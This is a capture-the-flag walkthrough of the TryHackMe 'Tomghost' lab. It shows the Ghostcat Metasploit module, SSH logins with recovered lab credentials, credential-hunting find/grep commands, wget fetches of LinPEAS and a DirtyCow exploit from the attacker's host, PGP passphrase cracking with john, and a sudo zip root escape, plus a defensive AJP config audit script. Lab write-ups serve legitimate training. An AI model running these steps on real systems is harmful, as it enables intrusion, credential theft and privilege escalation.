Tomghost

Running Tomcat 9.0.3 or something

Google exploits.

There’s one in Metasploit:

msfconsole
search tomcat
#find auxiliary that reads the credentials file
use auxiliary/admin/http/tomcat_ghostcat
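The Ghostcat module above works because the Tomcat AJP connector is reachable and accepts unauthenticated requests. As an added defender-side example (not part of the original notes), this Python script parses a Tomcat server.xml and flags AJP connectors that are not bound to loopback or have no shared secret; it uses Tomcat's real `address`, `secretRequired` and `secret` connector attributes, and the two server.xml samples are constructed for the demo:

```python
import xml.etree.ElementTree as ET

# Constructed sample: a typical pre-hardening server.xml (not taken from any real host).
WEAK_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""

# Constructed sample: same file after hardening (placeholder secret).
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_RANDOM_SECRET"/>
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return (port, issue) tuples for every AJP connector that looks exposed.

    - no 'address' or a non-loopback one: unpatched Tomcat binds AJP on all
      interfaces, so any host that can reach the port can speak AJP to it.
    - secretRequired="false", or no 'secret' configured: no shared secret is
      checked on incoming AJP requests (patched releases refuse to start an
      AJP connector without a secret; older ones simply accept anonymous AJP).
    If AJP is not used by a front-end proxy at all, remove the connector.
    """
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue  # only AJP connectors matter here
        port = conn.get("port", "?")
        address = conn.get("address")
        if address not in LOOPBACK:
            findings.append((port, "AJP bound to %s" % (address or "all interfaces")))
        if conn.get("secretRequired", "true").lower() != "true" or not conn.get("secret"):
            findings.append((port, "no AJP shared secret enforced"))
    return findings


if __name__ == "__main__":
    for port, issue in audit_ajp_connectors(WEAK_SERVER_XML):
        print("port %s: %s" % (port, issue))
```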

credentials:

skyfuck:8730281lkjlkjdqlksalks

try it on ssh:

ssh skyfuck@10.10.132.129

we get a shell! Basic checks:

sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
env
ls -la

nothing from those, but we found a pgp credential file and a key:

credential.pgp
tryhackme.asc

how to decrypt:

add the key:

gpg --import tryhackme.asc

check the list of keys to see if it’s added:

gpg --list-secret-keys

decrypt:

gpg --output decrypted_credentials.txt --decrypt credential.pgp

read it:

cat decrypted_credentials.txt

this doesn’t work though, it needs a passphrase.

LinPEAS?

cd transfer
python3 -m http.server 80   # on our machine, serving linpeas.sh
wget http://10.6.62.12/linpeas.sh   # on the target

give it perms:

chmod +x linpeas.sh

run it:

./linpeas.sh

it found dirtycow and also a writable path:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses

Try dirtycow first:

wget http://10.6.62.12/dirtycow.c

compile:

gcc -pthread dirtycow.c -o dirtycow -lcrypt

run it:

./dirtycow
# or with a chosen password for the new user
./dirtycow bmw340i

switch user by:

su firefart

or

ssh firefart@10.10.132.129

This machine does not have gcc!

Can we get the pgp to work on our own machine instead?

send files to our machine:

scp skyfuck@10.10.132.129:tryhackme.asc .

password:

8730281lkjlkjdqlksalks

other file:

scp skyfuck@10.10.132.129:credential.pgp .

the passphrase can be cracked with johntheripper!

https://www.openwall.com/lists/john-users/2015/11/17/1

gpg2john tryhackme.asc > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

cracked:

alexandru

use it as the passphrase to decrypt:

gpg --output decrypted_credentials.txt --decrypt credential.pgp

read the decrypted file:

cat decrypted_credentials.txt

we get new login:

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

ssh?

ssh merlin@10.10.132.129

basic check:

sudo -l

we have sudo with no password for zip. Check GTFOBins?

it has an entry!

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'bash #'
sudo rm $TF

^edited from the GTFOBins entry to use bash instead of sh

cd /root
cat root.txt